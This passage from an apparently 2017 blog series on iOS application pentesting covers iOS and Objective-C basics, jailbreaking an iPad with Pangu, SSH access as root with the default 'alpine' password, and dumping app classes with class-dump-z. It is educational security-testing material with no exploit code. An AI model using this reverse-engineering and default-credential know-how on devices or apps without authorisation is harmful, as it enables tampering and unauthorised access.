<br />
As we can see from upper picture, file as been save to /var/tmp/clutch/someid/. So lets go into this directory.<br />
So we have a executable file in this directory. Great !<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7rFfP1TaPEY4lTPmh43jYp6eM5DS2xhjIRoWUzNiiqan5YT-urCjkXxTq04qcExkJNi6YB1C18pP6HDe4huWKCvi1xW6Etqh0R83P7Ecrxv_PFjQffINTSl5VKBSAvNiReDwN874bPN4/s1600/Screen+Shot+2017-04-13+at+8.49.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7rFfP1TaPEY4lTPmh43jYp6eM5DS2xhjIRoWUzNiiqan5YT-urCjkXxTq04qcExkJNi6YB1C18pP6HDe4huWKCvi1xW6Etqh0R83P7Ecrxv_PFjQffINTSl5VKBSAvNiReDwN874bPN4/s640/Screen+Shot+2017-04-13+at+8.49.54+AM.png" width="640" /></a></div>
<br />
Now use command <b>class-dump-z RediffmailNG [</b>This command will now extract the class information]<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg17wLquyXZpDDkUF3tbsAwoQDaKRYEYY9JXtvAOnlO_llSMRFJloY6poHYSOMZrstjHrnj7ykQlHBQL37IbKW0R65CgtnYTFIakGkOLZfvZj8HlJ098oz-x3ALLTjSbzN8A1bz8oiUoAg/s1600/Screen+Shot+2017-04-13+at+8.51.24+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="572" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg17wLquyXZpDDkUF3tbsAwoQDaKRYEYY9JXtvAOnlO_llSMRFJloY6poHYSOMZrstjHrnj7ykQlHBQL37IbKW0R65CgtnYTFIakGkOLZfvZj8HlJ098oz-x3ALLTjSbzN8A1bz8oiUoAg/s640/Screen+Shot+2017-04-13+at+8.51.24+AM.png" width="640" /></a></div>
<br />
<br />
Thats all for this part.<br />
<br />
iIf you enjoying this post please do share and comment. We love to hear from your. :)<br />
<br />
<a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-2-ios.html" target="_blank">< Previous Post</a><br />
iOS Application Pentesting Part 2 : iOS Application Basics<br />
<br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff; min-height: 13.0px}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff; min-height: 13.0px}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff; min-height: 13.0px}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff; min-height: 13.0px}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
</div>
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 11.0px Menlo; color: #000000; background-color: #ffffff}
span.s1 {font-variant-ligatures: no-common-ligatures}
</style>
</div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-1219909127146589422017-04-13T08:54:00.000+05:302017-04-13T09:03:21.428+05:30iOS Application Pentesting Part 2 : iOS Application Basics<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNp2YIkFfGGJwGxMrG2aVbkkrLSe96mOZSpeO1gmvxgwo5b7yXgK7xH9lXP79xcoOAsxABDlf-MzmbPWJiCpCUx5ooWWkthVFzWvIzFEH83FsdNGgNcovB0r9P_JR17yTrHbVPujW2Lqc/s1600/ios-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNp2YIkFfGGJwGxMrG2aVbkkrLSe96mOZSpeO1gmvxgwo5b7yXgK7xH9lXP79xcoOAsxABDlf-MzmbPWJiCpCUx5ooWWkthVFzWvIzFEH83FsdNGgNcovB0r9P_JR17yTrHbVPujW2Lqc/s400/ios-logo.png" width="400" /></a></div>
<br />
In todays post, we will see iOS Application. Knowing our enemy before attacking is very important for us ;)<br />
<br />
iOS : If i can say in simple words, Its an Operating System which run various iDevices which is create By Apple Inc.<br />
<br />
iOS (formerly iPhone OS) is a mobile operating system created and developed by Apple Inc. exclusively for its hardware. It is the operating system that presently powers many of the company's mobile devices, including the iPhone, iPad, and iPod Touch. It is the second most popular mobile operating system globally after Android. iPad tablets are also the second most popular, by sales, against Android since 2013.[9]<br />
<a name='more'></a><br />
Originally unveiled in 2007 for the iPhone, iOS has been extended to support other Apple devices such as the iPod Touch (September 2007) and the iPad (January 2010). As of January 2017, Apple's App Store contains more than 2.2 million iOS applications, 1 million of which are native for iPads. These mobile apps have collectively been downloaded more than 130 billion times.<br />
[Source - <a href="https://en.wikipedia.org/wiki/IOS">https://en.wikipedia.org/wiki/IOS</a> ]<br />
<br />
Applications which comes pre-installed in the device placed in /Applications Folder in the device.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhu5qB2JXiMRuAZrsLF3YPKB_l8hANZ_FDolKNrckQziMojJVYawstUdGggsYvS0JeQfQxVczBpJrsB7foIvXNoJyoD3AkyhzcwCn5ZttHO1SQQGdDbAxn5iWoNsgPnAVE8vuKu4u__Yo/s1600/Screen+Shot+2017-04-11+at+10.08.01+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhu5qB2JXiMRuAZrsLF3YPKB_l8hANZ_FDolKNrckQziMojJVYawstUdGggsYvS0JeQfQxVczBpJrsB7foIvXNoJyoD3AkyhzcwCn5ZttHO1SQQGdDbAxn5iWoNsgPnAVE8vuKu4u__Yo/s640/Screen+Shot+2017-04-11+at+10.08.01+PM.png" width="640" /></a></div>
And application which seprately installed by user will store in /var/containers/Bundle/Application/ [iOS9] On previous iOS Version the custom application folder was /var/mobile/Applications/.<br />
<br />
Its depend on your iOS version, kindly look for storage location as per your iOS version.<br />
<br />
Every device has his own Hardware and OS which is running on it then Application which is running with the OS.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkYHqPIofHNN1hESyyjJEQOBucwSk1r5FvgH2g0QSLbgDc1PIcL6q6HP-0czcWoZ0JI0psecifNjo7e72OKjKTabZHsUOxtLAMR2o1iV8Cx1YH3no8j2eXr6Jm0EL9FKhlYwayDSyu5D0/s1600/Screen+Shot+2017-04-11+at+9.33.54+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgkYHqPIofHNN1hESyyjJEQOBucwSk1r5FvgH2g0QSLbgDc1PIcL6q6HP-0czcWoZ0JI0psecifNjo7e72OKjKTabZHsUOxtLAMR2o1iV8Cx1YH3no8j2eXr6Jm0EL9FKhlYwayDSyu5D0/s320/Screen+Shot+2017-04-11+at+9.33.54+PM.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Now question arise that How that all applications are made.</b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
iOS Application are made in Objective-C which is derived from Next OS and we can say Objective-C is newer version of Next OS.Most of the iOS application are coded in Objective-C .</div>
<div class="western" style="margin-bottom: 0cm;">
<b>Objective-C</b> is a
runtime oriented language. a runtime language which decides what to
implement in a function and other decisions during the runtime of the
applications. But Objective-C a runtime oriented language rather then
only runtime language,
</div>
<div class="western" style="margin-bottom: 0cm;">
In the short note it
which means that it may changes the flow/decision when the code in
the application is actually being executed</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
The Objective-C model of object-oriented programming is based on message passing to object instances. In Objective-C one does not call a method; one sends a message. This is unlike the Simula-style programming model used by C++. The difference between these two concepts is in how the code referenced by the method or message name is executed. In a Simula-style language, the method name is in most cases bound to a section of code in the target class by the compiler. In Smalltalk and Objective-C, the target of a message is resolved at runtime, with the receiving object itself interpreting the message. A method is identified by a selector or SEL — a NUL-terminated string representing its name — and resolved to a C method pointer implementing it: an IMP.[17] A consequence of this is that the message-passing system has no type checking. The object to which the message is directed — the receiver — is not guaranteed to respond to a message, and if it does not, it raises an exception.[18]</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
Sending the message method to the object pointed to by the pointer obj would require the following code in C++:</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
obj->method(argument);</div>
<div class="western" style="margin-bottom: 0cm;">
In Objective-C, this is written as follows:</div>
<div class="western" style="margin-bottom: 0cm;">
<br /></div>
<div class="western" style="margin-bottom: 0cm;">
[obj method:argument];</div>
<div class="western" style="margin-bottom: 0cm;">
Both styles of programming have their strengths and weaknesses. Object-oriented programming in the Simula (C++) style allows multiple inheritance and faster execution by using compile-time binding whenever possible, but it does not support dynamic binding by default. It also forces all methods to have a corresponding implementation unless they are abstract. The Smalltalk-style programming as used in Objective-C allows messages to go unimplemented, with the method resolved to its implementation at runtime. For example, a message may be sent to a collection of objects, to which only some will be expected to respond, without fear of producing runtime errors. Message passing also does not require that an object be defined at compile time. An implementation is still required for the method to be called in the derived object. (See the dynamic typing section below for more advantages of dynamic (late) binding.)<br />
<br />
If you need more information on iOS please go this page - <a href="https://en.wikipedia.org/wiki/IOS">https://en.wikipedia.org/wiki/IOS</a><br />
<br />
<div style="text-align: right;">
<a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-3.html" target="_blank">Next Post</a></div>
<div style="text-align: right;">
iOS Application Pentesting Part 3 : Extracting iOS App Class Information</div>
<div style="text-align: left;">
<br />
< <a href="http://www.websecgeeks.com/2017/04/ios-application-pentesting-part-1.html" target="_blank">Previous Post</a></div>
<div style="text-align: left;">
iOS Application Pentesting Part 1 : Setting Up The Attacking Environment</div>
<div style="text-align: left;">
<br /></div>
</div>
<style type="text/css">
<!--
@page { margin: 2cm }
P { margin-bottom: 0.21cm }
-->
</style></div>
Narendra Bhatihttp://www.blogger.com/profile/15834240919754131768noreply@blogger.com0tag:blogger.com,1999:blog-3462277729309057123.post-74671873837078009652017-04-11T21:12:00.002+05:302017-04-16T20:33:15.891+05:30 iOS Application Pentesting Part 1 : Setting Up The Attacking Environment<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA4COlyoZd6Lah_EjZ0swUWiwVQGPKuL-L_-b_4a70dp-nMkbJtDjpKolY36u57bVQu_gC-v4IOwx4Rry5M9UlPzsAJtbG7niQOVekJGJuCKfm93GaYQE7T0pGkM5exH7hCIf9KF9OoJY/s1600/100804_iPhoneHack-450x299.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA4COlyoZd6Lah_EjZ0swUWiwVQGPKuL-L_-b_4a70dp-nMkbJtDjpKolY36u57bVQu_gC-v4IOwx4Rry5M9UlPzsAJtbG7niQOVekJGJuCKfm93GaYQE7T0pGkM5exH7hCIf9KF9OoJY/s400/100804_iPhoneHack-450x299.jpg" width="400" /></a></div>
<div style="text-align: center;">
<br /></div>
<h2 style="text-align: center;">
<b>iOS Application Pentesting Part 1 : Introduction To iOS </b></h2>
<div>
<b><br /></b></div>
<div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;">In this
article, we will see essentials tools and environment which we required to perform
penetration testing and Vulnerability assessment on iOS Applications.</span><span style="font-family: "arial" , sans-serif;"><o:p></o:p></span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><br /></span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><b>JailBreaking Your Device : ;) </b></span></div>
<div class="MsoNormal">
<span style="background: white; font-family: "arial" , sans-serif; line-height: 107%;"><b><br /></b></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">First thing first, if you are very serious about iOS Application Pentesting then you should required a Jailbroken device with you.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Below we will see how we can JailBreak a iOS Device.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">iOS JailBreaking have a great history, First pangu have Jailbroke the iOS then other team did the same.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Be frank to Jailbrea iOS device, First you need to check whether your Installed iOS Version is already JailBroken or not. </span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><b>Note - </b>For this particular tutorial we will use Xcode Simulator but highly recommended you to get A Jailbreak Device if you are very serious about learning iOS Application Pentesting.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"></span></span><br />
<a name='more'></a><span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">In my case on my iPad Air 2 I am using 9.3 which is JailBroken by Pangu Team few months back. You can find that information <a href="http://en.pangu.io/help.html">here</a></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhifdWqswuq1RvmDnmyeHvmKHtn9A9l7Rsyy9JNL7HwJQdWSabc51uQ3FmakSD6oHBDyK85QBws3cQwCJ7l6TzlmHi6qRXVWRBtfMYy47LjuzMk-sUcDaqgBJryKu6IBezjCytiCoDfw4c/s1600/IMG_0083.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhifdWqswuq1RvmDnmyeHvmKHtn9A9l7Rsyy9JNL7HwJQdWSabc51uQ3FmakSD6oHBDyK85QBws3cQwCJ7l6TzlmHi6qRXVWRBtfMYy47LjuzMk-sUcDaqgBJryKu6IBezjCytiCoDfw4c/s640/IMG_0083.PNG" width="480" /></a></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">Every JailBreak is different, So i recommend you to check your installed iOS Version for JailBreaking.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">JailBreaking Steps for iOS 9.3 is as below ( Taken From Pangu Website)</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">Preparation:</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">1. Pangu jailbreak IPA file NvwaStone_1.1.ipa available at http://pangu.io .</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">2. Cydia impactor available at http://www.cydiaimpactor.com/ .</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">(Special Note: This tool, developed by Saurik, is used to sign the ipa file so that Pangu jailbreak tool can be executed on iOS devices. Cydia impactors does not collect your apple id and password. All the information is only used for applying a personal free certificate from Apple.)</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">3. A computer (Cydia impactor runs on all major OSes, including Windows, OS X, and Linux)</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">4. A valid Apple ID. (In case that you do not want to use your current Apple ID to apply the personal certificate for any reason, we suggest you apply a new Apple ID and use it)</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">Option “Use embedded certificate effective until April 2017"</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">• If you chose the option "Use embedded certificate effective until April 2017", Pangu 9 will install an app that is signed by a revoked certificate. Before April 2017, you will not need reinstall Pangu jailbreak app.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">• If you want to sign the app with your own certificate, do not select this option.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">Limitations:</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">1. An Apple ID can only apply for a certificate for a limited number of devices.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">2. The certificate will expire in 7 days. If your certificate gets expired, you need to follow the guide to install the jailbreak IPA again.</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;">After Following those steps, Cydia & Pangu will be display on your Application Menu as below</span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjve_e2_4O39bC1QxgtIK3HwLSP0ZMHUQq2K9I6LaXFqubER_4e9Os8iTIbMkcnM0dnHc8fVdpgPkhMGfyhTrXNvkitqEmlAlgtE0XVtR_Q2OCBjJePO07uUWVjHFywuIvssxwVuO-D2U/s1600/IMG_0084.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjve_e2_4O39bC1QxgtIK3HwLSP0ZMHUQq2K9I6LaXFqubER_4e9Os8iTIbMkcnM0dnHc8fVdpgPkhMGfyhTrXNvkitqEmlAlgtE0XVtR_Q2OCBjJePO07uUWVjHFywuIvssxwVuO-D2U/s400/IMG_0084.PNG" width="300" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><br /></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">And now you can access Cydia app, which have tons of application for JailBroken Devices.</span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTHZCNnIBRaU0fFTT8upHZoZ5qMH0RMatV_5957aKfvnnxhwUij1b3T-pBuG3l-1NQMfdHEkjZEjAGyUNzNNZ1RxTs2Bw_ZdA-H3fXjA5JvRtD1AGjHqYlZZuB5jFUBsPNhgMIKahbQE/s1600/IMG_0079.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOTHZCNnIBRaU0fFTT8upHZoZ5qMH0RMatV_5957aKfvnnxhwUij1b3T-pBuG3l-1NQMfdHEkjZEjAGyUNzNNZ1RxTs2Bw_ZdA-H3fXjA5JvRtD1AGjHqYlZZuB5jFUBsPNhgMIKahbQE/s400/IMG_0079.PNG" width="300" /></a></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><b>Installing Required Apps & Package On Device</b></span></span></div>
<div class="MsoNormal">
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">After JailBreaking the device, we need to install some of the important apps in it. Which will help us perform the pentest on the app and do various things.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Look for the Cydia App open it and search for "OpenSSH"</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Tap on it and tap Install button, in my case its already installed so its showing Modify.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsd8IC7gaClgMv0aOwpbEekBn7GJvy8LZTWner_cTF96umXiqfLgdwxp4_adaY0iSc1qdZyxuMVp2vvbgviE23g3WXPSGgfUr6W1Qh9A1ud2etCRVEFo9Retc7c5mv-AFXvVo1NktViMc/s1600/Screen+Shot+2017-04-11+at+8.52.48+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsd8IC7gaClgMv0aOwpbEekBn7GJvy8LZTWner_cTF96umXiqfLgdwxp4_adaY0iSc1qdZyxuMVp2vvbgviE23g3WXPSGgfUr6W1Qh9A1ud2etCRVEFo9Retc7c5mv-AFXvVo1NktViMc/s640/Screen+Shot+2017-04-11+at+8.52.48+PM.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7C82uUgQ5jf27exbooLak4AKeW9ObHNDyktYHWiO4RoWjVWUNYPAUrAwRivLZ4MkdKPrzWjkS5dnKcHr7TeDGS406BQ8zPQHJ8GlMVqQJ4Q5RimCYwCTnuHHmK0bCXUrDtwb1yaDUXBM/s1600/Screen+Shot+2017-04-11+at+8.52.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7C82uUgQ5jf27exbooLak4AKeW9ObHNDyktYHWiO4RoWjVWUNYPAUrAwRivLZ4MkdKPrzWjkS5dnKcHr7TeDGS406BQ8zPQHJ8GlMVqQJ4Q5RimCYwCTnuHHmK0bCXUrDtwb1yaDUXBM/s640/Screen+Shot+2017-04-11+at+8.52.37+PM.png" width="640" /></a></div>
<br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Lets try to SSH our device. First get the IP address of our device.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">For this, Go to Settings>Wifi>Click On Your Access Point Name</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnEqIAoFdgWkFkg9oDJGEnYFG7Cc3xDmBP7Xy8kqkf8Q4hN4cIOfySD6ZZMmlpA_BlcbG-teH0FxjRxgULYCTSpntHKcyVkWlqYCgdM1Q_NQgxavjqzVIwKqXlv05HGh4JpvMJC2pRkM/s1600/Screen+Shot+2017-04-11+at+8.52.26+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="586" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGnEqIAoFdgWkFkg9oDJGEnYFG7Cc3xDmBP7Xy8kqkf8Q4hN4cIOfySD6ZZMmlpA_BlcbG-teH0FxjRxgULYCTSpntHKcyVkWlqYCgdM1Q_NQgxavjqzVIwKqXlv05HGh4JpvMJC2pRkM/s640/Screen+Shot+2017-04-11+at+8.52.26+PM.png" width="640" /></a></div>
<br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">As we can see the IP is 192.168.0.7. Lets do SSH on this as user root. By default the SSH password is <b>alpine </b>but i suggest you to change this to your own desired one due to Security Issues.</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Command - ssh root@192.168.0.7</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx4JjBydqn06tJOkaG6iKn90RtQYhd0HMhQc-6Rxpgf_UxzMSqSyXP5leTAA7OhrvSdr9BmXSrGO6_EYNmT_4MMyy7fUMqBJGGjUVot5hued-L8UFs004j2m1eAMcYEyZlPtSUdigQKCg/s1600/Screen+Shot+2017-04-11+at+8.27.15+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhx4JjBydqn06tJOkaG6iKn90RtQYhd0HMhQc-6Rxpgf_UxzMSqSyXP5leTAA7OhrvSdr9BmXSrGO6_EYNmT_4MMyy7fUMqBJGGjUVot5hued-L8UFs004j2m1eAMcYEyZlPtSUdigQKCg/s640/Screen+Shot+2017-04-11+at+8.27.15+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Great, So we are logged in :)</span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Lets continue our Apps installing part. Now we are installing BigBoss Recommended Tools which contents important hacking tools package like </span>GNU Debugger, APT Transitional, GNU Debugger, Git, GNU Debugger, make, less unzip, wget SQLite etc. W</span><span style="background-color: white; font-family: "arial" , sans-serif;">hich comes very handy for iOS Application Pentesting</span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span></div>
<div class="MsoNormal">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixsW1_TjgyzGo44VIyCSTuALM3SFB6B-zf4c37sGsFL9KFh_PUbjSDzd0SjChahRprjJShN03Ldi5tdb45edBMPwxnYhf4bQRRFoHDrovtDHf_1SaW0iUWk7QBgI7xjb6DK239b5EGNDo/s1600/Screen+Shot+2017-04-11+at+8.52.15+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="518" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixsW1_TjgyzGo44VIyCSTuALM3SFB6B-zf4c37sGsFL9KFh_PUbjSDzd0SjChahRprjJShN03Ldi5tdb45edBMPwxnYhf4bQRRFoHDrovtDHf_1SaW0iUWk7QBgI7xjb6DK239b5EGNDo/s640/Screen+Shot+2017-04-11+at+8.52.15+PM.png" width="640" /></a></div>
<br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;">Now we will install class-dump-z which allow us to dump class information from an iOS application.So we can download this from their <a href="https://www.blogger.com/"><span id="goog_1443538989"></span>Official Page </a></span></span><br />
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fUKNfnyaQu_PhUkWBrIrioQyqsCBL0ArcMK0dYhIqsMxKUWIpST4r6gTAxAREVO51HrV514oZfKVR2kPulEXDvFFxI7c9XA_otXO19l9DS6wHlyWXjuNjy_BZ43dmgwl7X8K0eNVzfU/s1600/Screen+Shot+2017-04-11+at+8.56.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-fUKNfnyaQu_PhUkWBrIrioQyqsCBL0ArcMK0dYhIqsMxKUWIpST4r6gTAxAREVO51HrV514oZfKVR2kPulEXDvFFxI7c9XA_otXO19l9DS6wHlyWXjuNjy_BZ43dmgwl7X8K0eNVzfU/s640/Screen+Shot+2017-04-11+at+8.56.49+PM.png" width="640" /></a></div>
<span style="font-family: "arial" , sans-serif;"><span style="background-color: white;"><br /></span></span>
